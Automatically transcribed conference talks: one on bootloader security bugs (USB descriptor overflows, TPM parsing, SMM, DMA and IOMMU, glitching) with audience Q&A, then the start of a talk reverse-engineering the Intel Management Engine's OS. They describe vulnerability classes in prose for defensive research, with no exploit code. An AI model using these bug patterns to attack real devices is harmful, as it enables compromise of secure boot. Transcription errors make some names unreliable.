32 elements but I'm going to give you 64 configurations. It'll happily write 64 configurations in a place that can only hold 32 of them. And exactly the same thing for number of interfaces. Tiana core had similar bugs where this was Tiana core where they go and get a descriptor and the descriptor length says okay now go fetch me the whole thing and use that descriptor length except the original hub descriptor was a very small struct and the descriptor length is a U and 8 so you can set up to 255 bytes and so that would have smashed memory and caused a stack corruption. And so as you can see here the fix here wasn't actually at a bound check but just to make the buffer bigger because you know the length is U and 8 so if you just make the buffer 256 then any length you give it will fit within the buffer. Yeah this is an example in C BIOS where this is the classic double fetch where it goes and gets the header, does an alloc based on the header and then gets the header again with the content and it doesn't verify that config W total length is the same thing as CFG to W total length and because that verification isn't there whoever calls this thing can no longer trust W total length because it could be invalid. And so as I said USB to me is one of the prime attack services to secure boot and so I want to sort of very very briefly mention two recent real world cases where devices got broken into because of USB parsing in the boot loader. So this was this is a case of the Nintendo switch the Tegra this was done by the failover flow people about a year or so ago that basically you know you give it a length that's not validated and then a mem copy and that causes memory corruption and then the recent iPhone checkmate this is slightly more complicated because it wasn't a straight memory corruption but it was you know if you fiddle around enough with the state it sort of gets out of sync and it has all these pointers that it's still considered to be alive but the memory has been freed and so you end up this ends up what you use after free but it is because of a sequence of USB packets that are being sent. Right so that's it for USB obviously bunch of the buses or almost any bus on your device if your boot chain uses it is interesting attack surface and this is spy I mean spy flash and be trusted, SDIO, I2C, LPC even your TPM right even your TPM response you get back from TPM can't be trusted because somebody could desolder your TPM and pretend to be your TPM and if you don't now validate the data you get from TPM you end up with memory corruption. So this is for example what happened in CBIOS. CBIOS has this talk show TPM and it goes and gets this structure and you can send it less than what it expects and then basically they subtract some size of a struct minus less what they expect and so that causes integer underflow which ends up with a really big size and then that size is given to malloc and malloc internally has an end overflow so that really big size then becomes a very small size and then they copy into it and that causes memory corruption and so this is a combination of two bugs right one is where the sizes are wrong and then secondly is where the malloc has an internal integer overflow and this is the malloc internals of CBIOS which I don't want to dive into now because it's pretty convoluted and complex I'll leave this as an exercise to the audience to figure out where the int overflow is and technically it's not an overflow because it's a bunch of shifting being done but it essentially comes down to an int overflow. Yeah, there we go. Yep, there we go. Okay. So another service attack service that is interesting but often overlooked on devices except for Ufie is system management mode and I mean there have been over the last decade and a half numerous presentations about SMM attack service and break SMM handlers for Ufie because it's an x86 thing and you see this in Ufie stacks and it was a cat and mouse game where for years somebody breaks something and then Ufie fixes it and then somebody breaks it again and Ufie fixes it again and somebody makes it again and Ufie goes okay let's do mitigation for this and this has gone on for like 15, 16 years and occasionally people still find bugs but by and large Ufie does fairly well now with regards to SMM handling. There's some third party stuff that still breaks occasionally but in general they got a handle on this. Now what if you're using x86 but you re-implement your own boot loader and you don't use Ufie, right? Well that means you're going to run into all the same problems Ufie had and you're going to screw it up in all the same ways and it'll take you another 15 years to get it right. But I guess if you were to try it the first time this is what Corboot does and to their credit they say oh we get input we should range check it and their range check says to do. Okay so now I talked about a bunch of buses. The thing to me that sort of separates that from other things is when you do DMA. Generally for as long as DMA has been around DMA is game over. If you get DMA then that's that there's no trust boundary. Obviously that's no longer true. We have IOMM use and if you use them and if you have a device that has this available then old-sodd DMA can be stopped, it can be contained, it can be regulated and so it's no longer a sort of game over and you can implement a trust boundary. A few things there. A if you are an embedded device and you're using IOMM use you are way ahead of the curve because not that many people are doing this right. You should but it takes some effort. There's obviously many different IOMM use it depends on your architecture and sort of the board you have and all sorts of things. So Intel's VDD, ARM is SMMU, AMD has like the device exclusion and it's got a few other ones as well. But basically if you use one of these you can sort of DMA is no longer the game over. Now that doesn't mean that you're in the clear. Once you define DMA as an attack surface you have to defend it and that's where you get some difficulty because you'll end up using drivers that have been written before it was a trust boundary and I mean no one has ever written a DMA handler with a trust boundary in mind because you assume there's no trust boundary. So now if you start using the IOMM you have to go back and look at where am I doing DMA and now I can no longer trust what's in when I get back from DMA and you have to go validate all this stuff. But even if you do all of that right which by the way is very hard and you probably won't do it right but let's say you do. Secondly because DMA is now a trust boundary any time you open up a memory window for a device you can't just open it up you have to clear the memory first because otherwise now you're leaking memory to a device right. So all these sort of new things sort of show up if you take DMA as a trust boundary. And let's say you do that right well now you still have a dependency on the IOMM you because you are assuming the IOMM you's perfect when it probably isn't right. I haven't really gotten to this part yet but one of my plans for the future is to go look at IOMM you and see if I can attack IOMM you and then find bugs there. I strongly suspect there will be side channels and logic bugs and maybe maybe even some heart room implementation bugs. So bug-wise this is where it sort of gets design-y right. So this is what this is Ufie today, it's EDK2 platform code where it has support for IOMM you and they're ahead of the curve. But if you look at the spec there's no good handover protocol from Ufie to the next stage. And so Ufie basically boots up and very early configures the IOMM you and make sure that devices can't peek or poke arbitrary physical memory and then it does all of its stages and then it's about to hand off and it goes well I don't know if the next guy supports IOMM you so it undoes all the IOMM program it does, turns the thing off, opens up everything and then hands it over to the next guy. So you did all this work for nothing. And this is a spec bug and it's being worked on, people are very much aware of this. People at Apple have fixed this for their devices. This is going to get fixed in the future but given that this has to be done by spec it takes a while because you have to get people to agree to it and then have numerous different implementations implement this. And this is where I hand it back over to Joe. Yeah, so hardware it's pretty much out of scope for the presentation. We did not look at any of this but we thought it would be naive to not at least mention it to people. And what we mean by that are like glitching, side channel, silicon stuff. And so with glitching you have like fault injections and a lot of times people go after things like the signature verification stuff so they'll basically glitch that part and then they'll start running on sign code. And a recent example of some glitching was done by fell overflow for the PS4 SISCON. And I forget the specifics, it's been a while. Really, really good blog post you should check out. But I think it went to like an infinite loop like go to debug mode or something and would say that's not enabled, infinite loop and then there's glitch out of it and initializes debug mode. And so stuff like that obviously should be concerned with then clearly side channel with timing discrepancies, power discrepancies, things like spec or muck down, speculative execution in general. These are where people are leaking secrets for going after keys so they can start signing their own code, stuff like that. And then chip suck. And this is somewhat interesting because it's obviously only relevant for a very sophisticated attacker. It's going to be somebody who has very expensive equipment. They do things like decapping, they use fibs and Sims. They can do things like optical ROM extraction and get the boot ROM and then start auditing that and then, you know, find a bug and exploit it. And obviously totally out of scope for the presentation. But one thing that's interesting about this is kind of presently it's still, you know, not a lot of people have this expensive equipment. But I think very soon you have people like John McMaster and stuff who have like a SEM in their garage, right? And so you're going to eventually start getting these regular hackers in their garage that will eventually get this equipment as the older equipment becomes more affordable and maybe that opens us up to more realistic instead of people just kind of ignoring it and they go, eh, I'm not worried about somebody with, you know, a quarter of a million dollars worth of equipment. Now it's turning into somebody who dropped 10K or 15K. And then, you know, a quick note on code integrity. It's something that people mess up a lot. It's kind of hard to do, right? You have people that do weak or crypto, you have blacklist problems and an example that is, you know, there's finite space for their blacklist. It will eventually get exhausted. So when you have stuff like where I mentioned that you have a signed grub, there's a known bug in a signed grub binary that was really Speckers-Bursky. And if that's not on the blacklist of your Ufi platform at home, you can just load that up and then exploit it and you just broke Secure Boot. And it's not going to get fixed until that platform has an up-to-date blacklist. And eventually, if all this crap gets blacklisted, eventually that list will be full and then they can't blacklist anymore. So it's a concern there. And then you'll have issues where they'll only sign certain portions, not the full blob, so you can, you know, still modify certain parts or sometimes you'll see they'll just check for signature existing, but they don't validate it. You know, really, really dumb stuff. So conclusions. Obviously this is the tip of the iceberg. There's a lot of stuff we didn't look at. And if it wasn't clear, we did not really audit these things. We literally would like chat with each other every day and be like, hey, we need a C by us bug. Okay, give me an hour. Okay, I got one. Okay, check the box and then let's move on to the next one. Our goal was to have an example of a bug for each list of the attack surface, an example of a bug for each list of the thing we looked at. And that was it. So, you know, once we found one, we stopped. So you guys should, you know, go hunting and have fun. But if it wasn't obvious, there's a surprising amount of low quality code. It's kind of crazy. And it's pretty clear that not a lot of people are looking at this stuff. And one thing that kind of sucks is you get to NDA hell really, really, really quick if you want to look at any of this proprietary stuff. So if you're interested in Qualcomm stuff, for example, and you want to get some documentation or look at it, you pretty much have to sacrifice a first born to get access to that stuff. Like it's just not going to happen. And it's kind of silly. So, you know, kind of like our advice and call to action is, you know, people should be minimizing their image, their boot environments, their host environments. You know, turn off features you don't need. If you don't need a network stack, why have it? If you don't need USB, why have it? All you're doing is enabling a attack surface for somebody to leverage. And something that we see a lot, which is insane, is like these little embedded devices that are running Linux and they have literally more drivers than our desktop at home. And it's just like, what is going on here? It doesn't make sense. You should really, really, really work on limiting the attack surface. And really quick mitigations. There aren't any in most environments. Yeah, they just aren't any. As you can see from the example from before, that was, you know, just from this morning, just really quick, you know, smash and, you know, over at the stored PC. And that's it. Like, there's no ASLR. There's no anything like that, code flow integrity, whatnot. But there's a link to a GitHub and that is an Intel employee that has gone and implemented a lot of these mitigations that are moving into Tiana core. So they are way, way, way ahead of the game of everyone else because they're actually getting a lot of these mitigations, which is quite impressive. And you should check it out because it's interesting code. So kind of a call to action. We really hope that this was inspirational to a few of you. If you've never looked at this stuff and it was always this black box that you weren't sure about, you should just start poking around. Go find the slide where we showed where the, you know, build instructions, where and go build some of these things and mess around. And you're going to have fun. And like we said, with no mitigations, you can work on some easier exploit dev stuff and it's cool. But it's clear that a lot of people need to be reviewing this because it's clearly not happening. People should start fuzzing interfaces. Everything we kind of showed should have been found with basic fuzzing. We're kind of at a point where I just said I'm just going to take like a teensy or something and have it just, you know, do that classic descriptor double fetch because I think we've seen that in like every USB stack. Like it just make a device and just start plugging it into stuff and just watch it break. And then obviously periodic reviews and whatnot. But yeah, that's pretty much it. So yeah. Well, thank you. Now we have about 10 minutes for Q and a and we will start immediately with the Internet. Thank you. Has the grab issue been fixed yet? And was the code unique to grab or borrowed from, you know, elsewhere? I don't think it's been fixed yet. And this was the this was from whatever the official group repository was. All right. If you have a question in the room, please line up at the microphone so I can see you. And now microphone number two. So let's say you want to make a more secure laptop. So you came to take poor boot, take a static kernel so that everything is in compiled in no normal no modules. But what about the text text services that such a somebody tries to interrupt the line of why why did this booting for example, that you may be some somehow get into make a maybe DMA access because you you somehow interfere with a let's say Broadcom network device that has some special firmware to optimize the traffic or something and that that this thing gets above over floated above over flow and make some problems on the on the bus or something. Are you talking about attack surface from devices? Yes, it's like that. Yes, I tell you you want to make a good system. So I think the best you can do if you have a laptop that you take a core boot and you take a Linux that you completely compile without module support everything you want to have is in the static kernel and that just boots and the kernel is in the core boot and so it's in the flesh. But you can get a problems by by by let's say some devices that just spit into your memory because they can do a DMA master. Yeah, that's that's that's definitely concern. And that's one of the things we were like, okay, well, if if you do use DMA as it has been forever, then that then it's game over. Luckily, nowadays we have IOMUs. So you depending if which situation you are in and what hardware you have, you can configure your device to use the IOMU. And if you're doing that, then even if a certain hardware device is compromised, you can still try to protect you know your CPU and your host from the device by having the IOMU. That I think I hope it answers your question, but it's about as good an answer as I can come up with. So so that's a bit so this is the maximum you can do against some attacks. I mean from a device, I want to make an extreme hard laptop that you use an extreme hostile environment. So again, you want to make a hard laptop that you use in a hostile environment, right? I mean, I think that's the best you can do right. I mean, you can go and look at your host West and look at how it parses the stuff that comes from the bus because there'll be there'll be bugs there too. But I think that's the best I can come up with. Yeah, I mean, you minimized the attack surface as much as you can, right? And then once once you have it as minimized as possible, then you just kind of hope hope there's nothing there. But you don't then you don't need to code signing because you have everything in your flesh or you still need some stumps. Oh, you mean the stuff that runs on the host? Yeah, I mean, obviously, let's say you have your corporate on the Linux in the flesh. And so everything is that we have that same. And you maybe take this discussion after the talk because we have more questions. Thanks. And signal angel please. What is your favorite disassembly that you use by reverse engineering the bootloaders? We didn't really we just looked at source code. We need to meet a few places. I mean, for this particular particular in this particular case, most of it was white box. So we didn't have much except for the exploit. We didn't have much need for the for this assembler. I guess a little bit of GDP in general when we do do reverse engineering. I mean, I does my go to I've been playing around with Gidra a little bit. It looks promising. Has on do which is nice. But those are usually and then you know for doing Linux have stuff GDP is nice when you're doing debugging. But generally IDA. Microphone number one place. I have two questions. What's your opinion on the arm trusted from architecture? I'm I have to work with this and I'm a little bit shocked. It's a little bit over complicated. And the second question is, should we also question the boot ROMs? Because what I've seen the special project, it leads me to believe that the boot ROM is also very broken. And then is the question if it's really necessary to harden the other stuff. Right. Yep. Those are those are really good questions. By the way, it sounds like you're working on this. So what your first question was what again? What do you think about the arm trust? Right. Yes. I like you. I've touched upon it in a few engagements. Unfortunately, any of the concrete stuff I can't really talk about because it was covered by non. Yeah, I see you where this is this problem. But I just I share your opinion that there are some things in there that are troubling. With regards to the boot ROMs, your spot answer, I mean, we try to bring this up in the one of the slides is if there's a buck there, you can't fix it. Hardware revision is the only way to fix it. So you kind of screwed. There are some designs you can do to try to minimize it. So you could say, okay, well, you can in your boot ROM, you could have a feature that allows for a quote unquote, patching the boot ROM where you can have a piece of something on storage that could overwrite what the boot ROM supposed to do. Obviously, up until that point, whatever's in the boot ROM, still, you can't fix that. But you can you can minimize the amount of stuff in the boot ROM that's not patchable. But you can minimize all of it. I mean, there's going to be some of it that is locked, burned in hardware and can never be fixed for that device. I'd love to hear of a better solution. I don't know of any. No, I was just going to say this kind of touches on when we said people underestimating reverse engineering, they kind of just keep it super, super block box. And it's the secret thing. And then, you know, when somebody finds a way to dump a boot ROM, they start looking at it, then they just see, you know, a bug in a USB USB stack. And then the switch goes down and or the iPhone or whatever else, right? So so yeah, it's from my perspective, that I would say it would make more sense to do more open, open auditing and let more eyes see it instead of hiding it in the corner and in pretending like, well, it's okay because nobody's looking. That's that's at least my perspective on it. I know why why people are super secretive about it. But you need more eyeballs. So maybe if you've got the right context, as my wish would be to get blank chips, so I could flash them with my own boot ROM. So I have a method to prove things and keep the text surface minimum. Yeah. And then there's going to be two other arm dies on there that are circumventing everything that you just did. Do we have more internet questions? Yes. Are you aware of any good and maybe even free bootloader fuzzle? Not in its whole. I mentioned a few places. So if you're doing any kind of file based stuff and you can isolate it, AFL is you know, that's the go to these days for network stuff. There's a couple of interesting ones like is sick and there's some Wi Fi fuzzles and and I think there's you know, some DNS fuzzles or things like that. So that works. I would say the best way in my opinion would be to pull out the interesting components that are doing the parsing and the stuff you're concerned about and write a harness for that. So you don't really need to try to write a fuzzle for that environment. You just pull that feature out and harness it up and then let it you know, run on a bunch of cores. Yes. I think live fuzzle might be very helpful there. All right. Number two, please. Hi. We have producing the occurrence of such errors by using another programming language like that would feature more secure things that compile time or during runtime like maybe Rust. Will it happen? If yes, are there alternative projects that use other languages other than see? I'm not aware. So I think you're right. I think we can reduce the amount of especially the memory corruption stuff. I mean, if you switch to something like Rust, even though I think on occasion there's some Rust corner case that shows up where something doesn't get caught by the verifier, those are weird corner cases. In general, yes. I think you're right. If we switch languages, a lot of memory corruption stuff goes away, but not everything goes away. All the design stuff is still there, right? I'm currently doing that though. Well, so there was actually there was a talk by Andrea Barisani yesterday or day before where he's doing a go runtime for an as a as a base for an ARM device. So this is an avenue that is currently in the beginning of being researched and being worked on. I think it's interesting. I think it's a direction one that we could go into. I think there's something there. At the present time, it still seems a bit too early. And the other thing is that while it does reduce the number of bugs that are going to be there in particular memory corruption stuff, it doesn't like there will still be, you know, your logic bugs and your hardware bugs and things like that. So it's not a silver bullet, but it could definitely help. Okay. And we are out of time. Please thank our speakers again.
The Achilles heel of [your secure device] is the secure boot chain. In this presentation we will show our results from auditing commonly used boot loaders and walk through the attack surface you open yourself up to. You would be surprised at how much attack surface exists when hardening and defense in depth is ignored. From remote attack surface via network protocol parsers to local filesystems and various BUS parsing, we will walk through the common mistakes we've seen by example and showcase how realistic it is for your product's secure boot chain to be compromised.
10.5446/53180 (DOI)
The next talk is an Intel Management Engine deep dive understanding the ME at the OS and hardware level and it is by Peter Boss. Please welcome him with a great round of applause. Right, so everybody hear me. Nice. Okay, so welcome. Well, this is me. I'm a student at Lyon University and yeah, I've been, I've always been really interested in how stuff works and when I got a new laptop, I was like, you know, how does this thing really boot? I knew everything from reset vector onwards. I wanted to know what happened before it. So first I started looking at the boot guard ACM and while looking through it, I realized that there were not everything was as it was supposed to be and that led to a later part in the boot process being vulnerable, which ended up in me discovering this and I found out here last year that I wasn't the only one to find it. Drama Hudson also found it and we reported it together, presented it at Hack in the Box and then at the same time I was already also looking at the management engine. Well, there had been a lot of research done on that before. It was mostly, the public info was mostly on the file system and on specific vulnerabilities, which still made it pretty hard to get started on reverse engineering it. So that's why I thought it might be useful for me to present this work here. So it's basically broken up into three parts. The first bit is just a quick introduction into the operating system it runs. So if you want to work on this yourself, you're more easily able to understand what's in your face in your December. So and then after that, I'll cover its role in the boot process and then also how this information can be used to start developing a new firmware for it or do more security research on it. So first of all, what exactly is the management engine? There's been a lot of fuss about it being a backdoor and everything. Well, in reality, it's, if it is or not, depends on the software that it runs. Basically, it's a processor with its own RAM and its own IOM and MUSE and everything sitting inside your Southridge. It's not in the CPU, it's in the Southridge. So when I say this is going to be about the sixth and seventh generation of Intel chips, I mean mostly motorboards from those generations. If you run a newer CPU on it, it will also work for that. So yeah, bit more detail. CPU runs based on the 8486, which is funny. It's quite an old CPU and it's still being used in almost every computer nowadays. So it has a little bit of its own RAM. It has quite a bit of built-in ROM. It has a hardware accelerated cryptographic unit and it has fuses, which are right once memory that's used to store security settings and keys and everything. And then some of the more scary features. It has bus bridges to all of the buses inside the Southridge. It connects the RAM on the CPU and it connects the network, which makes it really quite dangerous if there is a vulnerability or if it runs anything nefarious. And its tasks nowadays include starting the computer as well as adding management features. This is mostly used on servers where it can serve as a board management controller to remote keyboard and video. And it has security, boot guard, which is the signing of firmware and verification. It implements a firmware TPM. And there is also SDK to use it as a general purpose secure enclave. So on the software side of it, it runs a custom operating system, which parts of which are taken from Minix, a teaching operating system by Andrew Tanba. So it's a microkernel operating system, runs binaries that are in a completely custom format. And yeah, it's really quite high level system actually if you look at it in terms of the operating system. It runs mostly like Unix, which makes it kind of familiar, but it also has large custom parts. And yeah, like I said before in the talk, I'm going to be speaking about six, seven generation Intel Core chipsets. So that's sunrise point. Lewisburg, which is a server version of this. And also the laptop system on the chips that they're just called Intel Core low power. They also include the chips at a separate die. So it also applies to them. In fact, I've been testing most of the stuff that I'm going to tell you about on the laptop that's sitting right here, which is a Lenovo T460. The version of the firmware I've been looking at is 1100 1205. Right. So I do need to put this up there. I am not a part of Intel, nor have I signed any contracts to them. I found everything in ways that you could also do. Didn't have any leaked NDA stuff or anything that you couldn't get your hands on. Also, it's a very wide subject area, so there might be some mistakes here and there, but generally you should be right. Right. Well, if you want to get started working on an ME firmware, you've got to deal with the image file. You've got your SPI flash. Most of its firmware lives in the same flash chip as your bios, so you've got that image. And then how do you get the code out? Well, there's tools for that. It's already been extensively documented by other people. And you can basically just download a tool and run it against it, which makes this really easy. This is also the reason why there hasn't been a lot of research done yet. Before these tools were around, you couldn't get to all of the code. The kernel was compressed using Huffman tables, which were stored in ROM, and you couldn't get to the ROM without getting code execution on the thing. So there was basically no way of getting access to the kernel code and I think also to the system library, but that's not a problem anymore. You can just download a tool and unpack it. So the Intel tool to generate firmware images, which you can find in some open directories on the Internet, has Qt resources, XML files, which basically have the descriptions for all of the file formats used by these ME versions, including names and comments to go with those structure definitions. So that's really useful. Right. So when you look at one of these images, it has a couple of partitions, some of them overlap, and some of them are storage for it and some is code. So there's the main partitions, the FTPR and FTP, which contains the programs it runs. There's MFS, which is the read write file system it uses for persistent storage. And then there is a log to flash option, the possibility to embed a token that will tell the system to unlock all debug access, which has to be signed by Intel, so it's not really of any use to us. And then there is something interesting, the ROM bypass. Like I said, you can't get access to the ROM without running code on it. And the ROM is mass ROM, so it's internal to the chip, but Intel has to develop new ROM code and they have to test it without re-spinning the die every time. So they have the possibility on a unlocked pre-production chipset to completely bypass the internal ROM and load even the early boot code from the flash chip. Some of these images have leaks, and you can use them to get a look at the ROM code even without being able to dump it. It's going to be really useful later on. So then you've got these code partitions and they contain a whole lot of files. So there's the binaries themselves, which don't have any extension. There's the metadata files, so the binary format they use has no headers, nothing included, and all of that data is in the metadata file. And when you use the UnmE11 tool, you can actually convert those to text files for you so you can just get started without really understanding how they work. Yeah, so the metadata, it's tag length value structure, which contains a whole lot of information the operating system needs. It has the info on the module, whether it's data code, where it should be loaded, what the privileges of the process should be, a checksum for validating it, and also some higher level stuff such as device file definitions if it's a device driver or any other kind of server. I've actually written some code that uses this in some get-ups, so if you want to closer look at it, some of the slides have a link to a get-up file in there, which contains the full definitions. Right, so all of the code on the UnmE is signed and verified by Intel, so you can't just go and put in a new binary and say, hey, let's run this. The way they do this is they, in Intel's manufacturer time fuses, they have the hash of the public key that they use to sign it, and then on each flash partition there is a manifest which is signed by that key, and it contains the SHA hashes for all the metadata files, which then contain a SHA hash for the code files. It doesn't seem to be any major problems in verifying this, so it's useful to know, but you're not really going to use this. And then modules themselves, as I've said, they're flat binaries, mostly. The metadata contains all the info the kernel uses to reconstruct the actual program image in memory. And a curious thing here is that the actual base address for all the modules, for all the programs, is the same across an image, so if you have a different version it's going to be different, but if you have two programs from the same firmware, they're going to be loaded at the same virtual address. Right, so when you want to look at it, you're going to load it in some disassembler, like for example IDA, and you'll see this. It disassembles fine, but it's going to reference all kinds of memory that you don't have access to. So usually you think maybe I've loaded at the wrong address or am I missing some library? Well, here you've loaded it correctly if you use the address from the metadata file, but you are in fact missing a lot of memory segments. And let's just take a look at each of these. It's calling it search and decode, and it's pushing a pointer there which is data. And what's that? So it has shared libraries, even though it's flat binaries, it actually does use shared libraries because you only have one and a half megabyte of RAM. You don't want to link your C library into everything and waste all the memory you have. So there's the main system library, which is like libc on a Linux system. It's in a flash partition, so you can actually just load it and take a look at it easily. And it starts out with a jump table, so there's no symbols in the metadata file or anything. It doesn't do dynamic linking. It loads the pages for the shared library at a fixed address, which is also in the shared libraries metadata, and then it's just there in the process of memory, and it's going to jump there if it needs a function. And the functions themselves are just using the normal system 5 x86 calling convention, so it's pretty easy to look at that using your normal tools. There's no weird register argument passing going on here. So right. Those shared libraries, there's two of them, and this is where it gets annoying. The system library, you've got access to that, so you can just take your time and go through it and try to figure out, hey, is this open, or is this read, or what's this function doing? But then there's also another second really large library, which is in ROM. They have all the C library functions and some of their custom helper routines that don't interact with the kernel directly, such as the strings functions. They live in ROM, so when you've got your code, and this is basically where I was at when I was here last year, you're looking through it and you're seeing calls to a function you don't have the code for all over the place, and you have to figure out by its signature what is it doing. And that works for some of the functions. It's really difficult for other ones, so that really happened to start for a while. Then I managed to find one of these ROM bypass images, and I had to code for a very early development build of the ROM. This is where I got lucky. So the actual entry point addresses are fixed across an entire chipset family. So if you have an image for the server version of like the 100 series chipset, or for client version, or for desktop or laptop version, it's all going to be the same ROM address point, sorry, the ROM addresses. So even though the code might be different, you have the jump table, which means the addresses can stay fixed. So this only needs to be done once, and in fact, when I upload my slides later, there is a slide in there at the end that has the addresses for the most used functions. So you're not going to have to repeat that work, at least not for this chipset. So if you want to look at a simple module, you've loaded it, and now you've applied the things I just said, and you still don't have the data sections. In fact, I don't know what that function there is doing, but it's not very important. It actually returns a value, I think, that's not used anywhere, but it must have a purpose because it's there. Right. So then you look at the entry point, and this is a lot of stuff, and the main thing that matters here is on the right half of the screen, there is a listing from a Minix repository, and on the left half there is a disassembly from an ME module. So it's mostly the same. There is one key difference, though. The ME module actually has a little bit of code that runs before this C library startup function, and that function actually does all the ME specific initialization. There's a lot of stuff related to how C library data is kept because there's also no data segments for the C library being allocated by the kernel, so each process actually reserves a part of its own memory and tells the C library like any global variables you can store in there. But when you look at that function, one of the most important things that it calls is this function. It's very simple. It just copies a bunch of RAM. So they don't have support for initialized data sections. It's a flat binary. What they do is they actually use the BSS segment, sort of the zeroed segment at the end of the address space and copy over a bunch of data in the program. The program itself is not aware of this. It's really in the initialization code and in the linker script. So this is also something that's very important because you're going to need to also add that address in the data section. You're going to need to load the last bit of the binary, otherwise you're missing constants, at least in association values. Right. Then there's the full memory map. To the process itself, it's a flat 32-bit address space. It's got everything you expect in there. It's got the stack and the heap and everything. There's a little bit of heap allocated right on the initialization. This is basically how you derive the address space layout from the metadata. Especially the data segment and the stack itself, the location varies a lot because of the number of threads that they already use or the size of data sections. And also, those stack guards, they're not really stack guards. There's also metadata for each thread in there. But that's not, nothing that's relevant to the process itself, only to the kernel. And well, if you then skip forward a bit and you've done all this, you look at your, at your simple driver, like this is taken from a driver used to talk to the CPU. Like, okay, so when I say CPU or host, by the way, I mean the CPU, like your big Skylake or Kabylake or CoffeeLake, whatever, your big CPU that runs your own operating system. Right. So this is used to send messages there. But if you look at what's going on here, okay, I think I have a problem with the animation here. It sets up some stuff and then it calls a library function that's in the main SISLIP library, which actually has the main loop for the program. That's because Intel was smart and they added a nice framework for device driver implementing programs because it's microkernel, so device drivers are just usual in programs calling specific APIs. Then there's normal POSIX file IO, no standard IO, but it has all the normal open and read on IO, CTL and everything functions. And then there's more initialization for the server library. And this is basically what all the simple drivers look like in it. And then there's this. Because it's so low on memory, they don't actually use standard IO or even printf itself to do most of the debugging. It uses a thing that's called FEN. Oh, touch on that layer. So there's the familiar APIs that I talked about. It even has POSIX threads or at least a subset of it. And there is all the functions that you'd expect to find on some generic UNIX machine. So that shouldn't be too much of a problem to do with. But then there's also their own tracing solution. SVEN, that's what Intel calls it, the names in all the development tools that you can download from their site. Basically, they don't include format strings for a lot of the stuff. They just have a 32-bit identifier that is sent over the debug port. And it refers to a format string in a dictionary that you don't have. Whereas one of the dictionaries for a server chip floating around the internet, but even that is incomplete. And the normal non-NDA version of the developer tools has some 50 format strings for really common status messages it might output. But yeah, like if you see these functions, just realize it's doing some debug print there. It might be dumping some state or just telling it it's going to do something else. It's no important logic actually happens in here. Right. So then for device files, they're actually defined in the manifest. When the kernel loads a program and a program wants to expose some kind of interface to other programs, its manifest will contain or its metadata file will contain a special file producer entry. And that says, you know, you have these device files with a name and an access mode and a user group ID and everything. And the minor numbers. And the kernel sends this to the, or not the kernel, the program loader sends this to the virtual file system server and it automatically gets a device file pointing to the right major and minor number. And then there's also a library as I said to provide a framework for a driver. And that looks like this. It's really easy to use if you were a ME developer. You just write some callbacks for open and close and everything and it automatically calls them for you when a message comes in telling you that that happened. Which also makes it really easy to reverse engineer. Because if you look at a driver, it just loads some callbacks and you can know by their offset in the structure what actual call they're implementing. Right. So then there is one of the more weird things that's going on here. How the actual user land programs get access to memory map registers. There's a lot of this going on. It calls to a couple of functions that have some magic arguments. The second one you can easily tell is the offset because it increases in very nice part of two steps. So it's probably the register of sets and then what comes after it looks like a value. And then the first bit seems to be a magic number. Well, it's not. There's also an extension in metadata saying these are the memory map tile ranges. And those ranges, they each list the physical base address and the size and the permissions for them. Then the index in that list does not directly correspond to the magic value. The magic value actually you need to do a little computation on that and then you can access it through those functions. The computation itself might be familiar. Yeah. So these are the functions. The value is a segment selector. So they use them. Actually don't use paging for inter process isolation. They use segments like X86 particular mode segments. And for each memory map I arranged there's a separate segment. You manually specify that. Which is just weird to me. Like why would you use X86 segmenting on a modern system? Minix does it. But yeah, to extend that even to this. Luckily, normal address space is flat. Like to the process. Not to the kernel. Right. So now we can access memory map tile. That's all the really high level stuff. So what's going on under there? It's got all the basic micro kernel stuff. So message passing and then some optimizations to actually make it perform well on a really slow CPU. The basics are you can send a message. You can receive a message and you can send and receive a message where you basically say send a message, wait till a response comes in and then continue which is used to wrap function calls. This is mostly the same as in Minix. There's some subtle changes which I'll get to later. Then memory grants are something that only appeared in Minix really recently. It's a way for a process to basically create a new name for a piece of memory it has and give a different process access to it just by sharing the number. These are referred to by the process ID and the number of that range. So the process IDs are actually a local per process. So to uniquely identify why you need to say process ID plus that number. And they're only granted to a single process. So when a process creates one of these, it can't even access it itself unless it creates a grant for itself which it's not really that useful usually. These grants are used to prevent having to copy over all the data inside the IPC message used to implement a system call. These are the basic operations on it. You can create one, you can copy it to and from it. So you can't actually map it. A process that receives one of these has to say to the kernel using a system call, please write this data into that area of memory that belongs to a different process. And then there's also indirect grants because in Minix, they do have this but also only recently and usually if you have a micro kernel system, you would have to copy your buffer for read call first to the file system so you're going to end up back to either the hard disk driver or the device driver that's implementing a device file. So the ME actually allows you to create a grant pointing to a grant that was given to you by someone else. And then that grant will inherit the privileges of the process that creates it combined with those that it assigns to it. So if the process has a read write grant, it can create a read only or write only grant but it cannot, if it only has a read grant, it cannot write writes to it for a different process obviously. So then there's also some big differences from Minix. In Minix, you address the process by its process ID or thread ID with a generation number attached to it. In the ME, you can actually address IPC to a file descriptor. Kernel doesn't actually know a lot about file descriptors, it just implements the basic thing where you have a list of files and then each process has a list of file descriptors assigning integer numbers to those files to refer to them by. And this is used so you can, as a process, you can actually directly talk to a device driver without knowing what its process ID is. So you don't send it to the file system server, you send it to the file descriptor and the kernel just magically corrects it for you. And they move select into the kernel. So you can tell the kernel, hey, I want to wait till the file system server tells me that it has data available or till the message comes in. This is one of the most complicated system cause the ME offers. That's used in a normal program. You can mostly ignore it and just look like, hey, those arguments are the file descriptor sets has a bit of field and then there's the message that might have been received. And there's the ME logs because you don't just want to write to registers, you actually might want to do the direct memory access from hardware. So you can actually tell the kernel to lock one of these memory grants in RAM for you. It won't be swapped out anymore. And yeah, it will even tell you the physical address so you can just load that into a register. And it's not really that complicated. Just lock it, get a physical access right into a register and continue. Well, that's the most important stuff about the operating system. The hardware itself is a lot more complicated cause the operating system, once you have the code, you can just reverse engineer it and get to know it. The hardware, well, let's just say it's a real pain to have to reverse engineer a piece of hardware together with its driver. Like if you've got the driver code but you don't know what the registers do so you don't know what a lot of logic does and you're trying to, you know, figure out what the logic is and what the actual registers do. Right, so first you want to know which physical address goes where. And it's the metadata, the listings I showed you actually had names in there. Those are not in the metadata files themselves. I annotated those. So you just see the physical address and size but there's the one module, the bus driver module. And the bus driver, it is a normal user process but it implements stuff like PCI, configuration space accesses and those things. And it has a nice table in it with names for devices. So if you just run strings on it, you'll see these things. Yeah, when I saw this, I was pretty glad cause at least I could make sense what device was being talked to in a certain program. So the bus driver does all these things. It manages power gating to devices. It manages configuration space access. It manages the different kinds of buses and IOMM use that are on the system. And it makes sure that normal driver never has to know any of these details. It just asks it for a device by a number assigned to it at build time. And then the bus driver says, okay, here's a range of physical address space 